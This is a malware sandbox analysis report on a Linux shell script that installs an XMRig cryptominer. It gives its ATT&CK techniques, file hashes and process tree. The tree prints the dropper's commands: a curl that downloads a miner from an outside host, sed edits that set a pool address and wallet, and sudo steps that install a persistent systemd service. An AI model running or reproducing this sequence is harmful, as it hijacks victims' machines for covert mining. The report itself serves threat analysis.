xmrig_linux | d0763141bc30815e99ab8b99e7197b609ad842bf0443ceb6fc816fcf1851477d

Analysis

max time kernel
13s
max time network
128s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
24/03/2025, 16:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4thepool_miner.sh
Size

12KB
MD5

141cab1fb37bf8965b41b67ba12953f6
SHA1

ac5ad102aeb2dce1a48248df20bc132485daa3be
SHA256

d0763141bc30815e99ab8b99e7197b609ad842bf0443ceb6fc816fcf1851477d
SHA512

280558159a8bf8236e91ec7e03f5d8c95a32381167ab15fcf7d0999d5aecec70c46db4824e85788d570e349a279eeb031bea5da611914495b32c36e4bdb33293
SSDEEP

384:hOUS1SKKJW78m+D+cl+LjzqWTj1PmsbB1CH:wUS1SxJW78HNl+LjOWTj1PmI6H

Score

10^/10

xmrig_linux defense_evasion discovery miner persistence privilege_escalation upx

Malware Config

Signatures

Xmrig_linux family
xmrig_linux
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1562	chmod

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 7 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

pid	Process
1579	sudo
1583	sudo
1586	sudo
1608	sudo
1630	sudo
1524	sudo
1526	sudo

Enumerates running processes
Discovers information about currently running processes on the system

Modifies systemd 2 TTPs 1 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

persistence privilege_escalation

XDG Autostart Entries

T1547.013

Systemd Service

T1543.002

description	ioc	Process
File opened for modification	/etc/systemd/system/4thepool_miner.service	tee

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-2.dat	upx

Reads CPU attributes 1 TTPs 2 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	free
File opened for reading	/sys/devices/system/cpu/online	pgrep

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1548/status	pgrep
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/78/cmdline	pgrep
File opened for reading	/proc/10/status	pgrep
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/23/cmdline	pgrep
File opened for reading	/proc/83/status	pgrep
File opened for reading	/proc/177/cmdline	pgrep
File opened for reading	/proc/471/cmdline	pgrep
File opened for reading	/proc/488/cmdline	pgrep
File opened for reading	/proc/filesystems	id
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/10/cmdline	pgrep
File opened for reading	/proc/26/cmdline	pgrep
File opened for reading	/proc/84/cmdline	pgrep
File opened for reading	/proc/161/cmdline	pgrep
File opened for reading	/proc/953/status	pgrep
File opened for reading	/proc/1086/cmdline	pgrep
File opened for reading	/proc/1/sched	systemctl
File opened for reading	/proc/31/status	pgrep
File opened for reading	/proc/479/cmdline	pgrep
File opened for reading	/proc/1114/cmdline	pgrep
File opened for reading	/proc/1164/cmdline	pgrep
File opened for reading	/proc/1263/status	pgrep
File opened for reading	/proc/filesystems	sudo
File opened for reading	/proc/15/status	pgrep
File opened for reading	/proc/449/cmdline	pgrep
File opened for reading	/proc/1053/cmdline	pgrep
File opened for reading	/proc/1131/cmdline	pgrep
File opened for reading	/proc/1307/cmdline	pgrep
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/5/cmdline	pgrep
File opened for reading	/proc/408/cmdline	pgrep
File opened for reading	/proc/552/cmdline	pgrep
File opened for reading	/proc/661/status	pgrep
File opened for reading	/proc/1110/status	pgrep
File opened for reading	/proc/1495/cmdline	pgrep
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/21/cmdline	pgrep
File opened for reading	/proc/32/cmdline	pgrep
File opened for reading	/proc/1178/status	pgrep
File opened for reading	/proc/1311/cmdline	pgrep
File opened for reading	/proc/1343/cmdline	pgrep
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/self/fd	sudo
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/29/cmdline	pgrep
File opened for reading	/proc/170/status	pgrep
File opened for reading	/proc/172/status	pgrep
File opened for reading	/proc/180/status	pgrep
File opened for reading	/proc/479/status	pgrep
File opened for reading	/proc/534/cmdline	pgrep
File opened for reading	/proc/1185/status	pgrep
File opened for reading	/proc/8/status	pgrep
File opened for reading	/proc/169/status	pgrep
File opened for reading	/proc/603/cmdline	pgrep
File opened for reading	/proc/956/cmdline	pgrep
File opened for reading	/proc/1001/cmdline	pgrep
File opened for reading	/proc/1292/cmdline	pgrep
File opened for reading	/proc/filesystems	tar

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1571	sed

Writes file to tmp directory 12 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/4thepool/sedgVefdI	sed
File opened for modification	/tmp/4thepool/sedp335iL	sed
File opened for modification	/tmp/4thepool/sedIINmoL	sed
File opened for modification	/tmp/4thepool/sedWEPRaK	sed
File opened for modification	/tmp/4thepool/sedG5085L	sed
File opened for modification	/tmp/4thepool/sedeWL6HL	sed
File opened for modification	/tmp/4thepool/sedn2DedL	sed
File opened for modification	/tmp/sh-thd.AJSNcN	4thepool_miner.sh
File opened for modification	/tmp/xmrig.tar.gz	curl
File opened for modification	/tmp/4thepool/xmrig	tar
File opened for modification	/tmp/4thepool/config.json	tar
File opened for modification	/tmp/4thepool/config.json.bak	cp

/tmp/4thepool_miner.sh
/tmp/4thepool_miner.sh
1⤵
- Writes file to tmp directory
PID:1497
- /usr/bin/clear
  clear
  2⤵
  PID:1498
- /usr/bin/id
  id -u
  2⤵
  - Reads runtime system information
  PID:1499
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1500
- /bin/sleep
  sleep 2
  2⤵
  PID:1501
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1505
- /usr/bin/cut
  cut -f1 -d.
  2⤵
  PID:1508
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1509
- /usr/bin/nproc
  nproc
  2⤵
  PID:1510
- /usr/bin/awk
  awk "/^Mem:/{print \$2}"
  2⤵
  PID:1513
- /usr/bin/free
  free -m
  2⤵
  - Reads CPU attributes
  PID:1512
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1514
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1515
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1516
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1517
- /bin/grep
  grep -q c3pool_miner.service
  2⤵
  PID:1519
- /bin/systemctl
  systemctl list-unit-files
  2⤵
  PID:1518
- /bin/grep
  grep -q moneroocean_miner.service
  2⤵
  PID:1521
- /bin/systemctl
  systemctl list-unit-files
  2⤵
  - Reads runtime system information
  PID:1520
- /bin/grep
  grep -q 4thepool_miner.service
  2⤵
  PID:1523
- /bin/systemctl
  systemctl list-unit-files
  2⤵
  - Reads runtime system information
  PID:1522
- /usr/bin/sudo
  sudo -n true
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  - Reads runtime system information
  PID:1524
- - /bin/true
    true
    3⤵
    PID:1525
- /usr/bin/sudo
  sudo systemctl daemon-reload
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:1526
- - /bin/systemctl
    systemctl daemon-reload
    3⤵
    PID:1527
- /usr/bin/pgrep
  pgrep -x xmrig
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1548
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1549
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1550
- /bin/sleep
  sleep 5
  2⤵
  PID:1551
- /bin/mkdir
  mkdir -p /tmp/4thepool
  2⤵
  PID:1552
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1553
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1554
- /usr/bin/curl
  curl --connect-timeout 30 -L https://download.c3pool.org/xmrig_setup/raw/master/xmrig.tar.gz -o /tmp/xmrig.tar.gz
  2⤵
  - Writes file to tmp directory
  PID:1555
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1557
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1558
- /bin/tar
  tar xf /tmp/xmrig.tar.gz -C /tmp/4thepool
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1559
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:1560
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:1560
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:1560
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:1560
- - /sbin/gzip
    gzip -d
    3⤵
    PID:1560
- - /bin/gzip
    gzip -d
    3⤵
    PID:1560
- /bin/rm
  rm -f /tmp/xmrig.tar.gz
  2⤵
  PID:1561
- /bin/chmod
  chmod +x /tmp/4thepool/xmrig
  2⤵
  - File and Directory Permissions Modification
  PID:1562
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1563
- /bin/sed
  sed "s/[^a-zA-Z0-9]/_/g"
  2⤵
  PID:1566
- /bin/hostname
  hostname
  2⤵
  PID:1565
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1567
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1568
- /bin/cp
  cp /tmp/4thepool/config.json /tmp/4thepool/config.json.bak
  2⤵
  - Writes file to tmp directory
  PID:1569
- /bin/sed
  sed -i "s#\"url\":.*#\"url\": \"auto.4thepool.lol:3333\",#" /tmp/4thepool/config.json
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1570
- /bin/sed
  sed -i "s#\"user\":.*#\"user\": \"486xqw7ysXdKw7RkVzT5tdSiDtE6soxUdYaGaGE1GoaCdvBF7rVg5oMXL9pFx3rB1WUCZrJvd6AHMFWipeYt5eFNUx9pmPD\",#" /tmp/4thepool/config.json
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1571
- /bin/sed
  sed -i "s#\"pass\":.*#\"pass\": \"ubuntu1804_amd64_20240611_en_10\",#" /tmp/4thepool/config.json
  2⤵
  - Writes file to tmp directory
  PID:1572
- /bin/sed
  sed -i "s/\"cpu\": {/\"cpu\": {\\n \"enabled\": true,\\n \"priority\": 5,\\n \"threads\": 1,/" /tmp/4thepool/config.json
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1573
- /bin/sed
  sed -i "s/\"rx\": {/\"rx\": {\\n \"1gb-pages\": true,\\n \"rdmsr\": true,/" /tmp/4thepool/config.json
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1574
- /bin/sed
  sed -i "s/\"donate-level\": [0-9]*,/\"donate-level\": 1,/" /tmp/4thepool/config.json
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1575
- /bin/sed
  sed -i "s/\"print-time\": [0-9]*,/\"print-time\": 60,/" /tmp/4thepool/config.json
  2⤵
  - Writes file to tmp directory
  PID:1576
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1577
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1578
- /usr/bin/sudo
  sudo -n true
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  - Reads runtime system information
  PID:1579
- - /bin/true
    true
    3⤵
    PID:1580
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1581
- /usr/bin/sudo
  sudo tee /etc/systemd/system/4thepool_miner.service
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  - Reads runtime system information
  PID:1583
- - /usr/bin/tee
    tee /etc/systemd/system/4thepool_miner.service
    3⤵
    - Modifies systemd
    PID:1585
- /usr/bin/whoami
  whoami
  2⤵
  PID:1584
- /bin/cat
  cat
  2⤵
  PID:1582
- /usr/bin/sudo
  sudo systemctl daemon-reload
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:1586
- - /bin/systemctl
    systemctl daemon-reload
    3⤵
    - Reads runtime system information
    PID:1587
- /usr/bin/sudo
  sudo systemctl enable 4thepool_miner.service
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:1608
- - /bin/systemctl
    systemctl enable 4thepool_miner.service
    3⤵
    - Reads runtime system information
    PID:1609
- /usr/bin/sudo
  sudo systemctl start 4thepool_miner.service
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  - Reads runtime system information
  PID:1630
- - /bin/systemctl
    systemctl start 4thepool_miner.service
    3⤵
    PID:1631
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1633
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1634
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1635
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1636
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1637
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1638
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1639
- /bin/date
  date "+%Y-%m-%d %H:%M:%S"
  2⤵
  PID:1640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/4thepool/config.json

Filesize
2KB

MD5
eacca315516ac1e67cf8186125e8c91d

SHA1
02cebcdac9468f863f491a508b87e649d24db04d

SHA256
4930e0eb9d62e77c7295900508edd8502880ecccbebf727f5ab353f94dc3419a

SHA512
5275a8675375047d122432950a5d0eb8f27c9aafcaeb132ecd4a0da55ce3a627320973b073229b27dc0d2d23f174a7d5640072280b70fcfb6d011c7f8bf7cf88

Download Submit
/tmp/4thepool/sedG5085L

Filesize
2KB

MD5
8c5b959d4f029401865326ba6f7225c4

SHA1
ab683252ac86808f5905e8ad918458d0b14b23f2

SHA256
53d90bd090ce7571e1e9a86b48024fc8078f8e4e666924d3fe702f076e7c75e1

SHA512
2de7cbcdddfc8d428be6b9e5b137ddcb5ec88d693b49acfa0cab436b7743141946372e43f808ed9819427563af153941b450322fb63a6bb6ddaa5fe2cb568c91

Download Submit
/tmp/4thepool/sedIINmoL

Filesize
2KB

MD5
1dd92926f69560868b43e7cdd4f908ca

SHA1
424c3e14bfe02791ca03c6541942ba1a8926f1e5

SHA256
ccc144b02e87e1025cb84a878ce75a2c0d82dabf5b48bca110e659026da02989

SHA512
1cf2dcbe17c8c1ff33765c7f7aa7c902df3532316d9fb9942d9d85a132050695202d4aa4f8a24a56b95f15d11d13d3bc860f0db1073df88311958d3ac0ccd778

Download Submit
/tmp/4thepool/sedgVefdI

Filesize
2KB

MD5
9a90286d4bf7a64a1b39d280fb29f37b

SHA1
1caabcb10236762c6e0948c7fcb7024658b66fef

SHA256
1e470a2eee0aa7585c7514c0771c20f8dd518e7432580b1a14a9cd9d4d4fac48

SHA512
e85c5c6fa809ea5f372b062195b3652d2b8da8a2977422c4619ea020d3400f73e79e7509c5b4be83143b26ac10e53f021e106fc98a7d6aa3ebac2e91ef1f2524

Download Submit
/tmp/4thepool/sedp335iL

Filesize
2KB

MD5
84e8b0830747b1d1317a8c463c06bb9b

SHA1
de41000bfe151f239017c62157c1e9df71046c64

SHA256
e7c33f072df214e3fa6de95308123e69faf12defa48c14000b57b6907f33f4b6

SHA512
614ee5df076685be40d503cc2525693acf137cd75d3b367cc8711490f13662d9ed3ab687dbdf303f2b38d13e52a89c7d1dbbad372352a6c402ed6da1702532f2

Download Submit
/tmp/4thepool/xmrig

Filesize
3.2MB

MD5
b5390ba22dd90fe2ed6e35af985ea621

SHA1
0b907eee9a85d39f8f0d7c503cc1f84a71c4de10

SHA256
e00e9f9d8d3ea668fbc88ed25a9eefb5b9d8d86a993ff78482500e99ae64351e

SHA512
6dd915590b969b35798525366594e1ae1a4b57676500b99cca39f8c95f4fd2d1d253df639cc516ce123bd0ff5197cb6f5859d14731dd83941cda40fa6bca002a

Download Submit
/tmp/sh-thd.AJSNcN

Filesize
249B

MD5
547e23c2182bede1f02434f6e5db046d

SHA1
38e05c97a278af1d25b0de5db019cf59257a2121

SHA256
4048ddcaa699cf566b0696b2144660007e6c4343ff33451f9e4fd5e387669d24

SHA512
511a1b4aa7a6e9f3b867c6caea0e9274de3f2846f870003f4b3b2154d59f9e592de0d098ad27188d9071a8b6cf3af493649b1f6906f99339ceddd14b31d6159f

Download Submit
/tmp/xmrig.tar.gz

Filesize
3.2MB

MD5
6dc1042c4666cb3f9aac03efe4304add

SHA1
ffbec552deff72cac76d3fd97a444b6e6ee48e7f

SHA256
7f9ae2402469f4dafdcc859c7b46e76a5e5dae638d5bf880938541f318ca3b1f

SHA512
8716c3f2be8d2dfa62fe00319f1126a99eb75dd914096970d5dc92be2e2ce03ac5e10fa6aba471668acb877fe7b4145e1d9b329fa805026429940629969110a5

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads